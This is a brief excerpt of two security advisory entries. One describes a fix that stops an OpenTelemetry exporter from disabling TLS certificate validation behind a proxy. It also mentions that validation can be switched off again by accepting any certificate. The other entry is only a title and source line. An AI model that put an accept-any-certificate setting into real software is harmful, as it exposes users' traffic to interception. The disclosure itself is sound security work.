GHSA-wfr5-454p-mjc2 (OpenTelemetry.Exporter.Instana) fix: Pull request #4153 refactors the HttpClient creation so that TLS certificate validation is no longer disabled by default when using a proxy. For environments where disabling certificate validation is necessary (such as local development), the previous behavior can be restored by configuring a custom HttpClientFactory with ServerCertificateCustomValidationCallback set to accept any certificate, as shown in the code example provided in the advisory's remediation section. Source: GitHub Advisory Database.

GHSA-5c57-rqjx-35g2 (Cline Kanban Server) source: GitHub Advisory Database.